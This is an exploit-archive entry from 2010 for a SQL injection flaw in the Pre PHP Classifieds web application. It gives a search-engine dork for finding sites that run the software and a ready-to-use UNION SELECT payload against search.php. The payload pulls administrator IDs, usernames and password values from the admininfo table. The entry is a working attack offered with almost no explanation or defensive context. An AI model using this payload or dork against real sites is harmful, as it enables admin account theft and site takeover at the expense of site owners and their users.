[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pre PHP Classifieds SQL Injection Vulnerability
# Published : 2010-06-22
# Author : Sangteamtham
# Previous Title : K-Search (SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : Softbiz PHP FAQ Script Blind SQL Injection Vulnerability
> #######################################################################
> # Source: PHP Classifieds SQL injection Vulnerability
> # Download: http://preproject.com/products.asp
> # Dork : Power by PHP Classifieds
> # Author: Sangteamtham@gmail.com
> #
> #######################################################################
Exploit:
http://localhost/clas/search.php?category=999999 UNION SELECT
group_concat(adminid,0x3a,username,0x3a,password) from admininfo--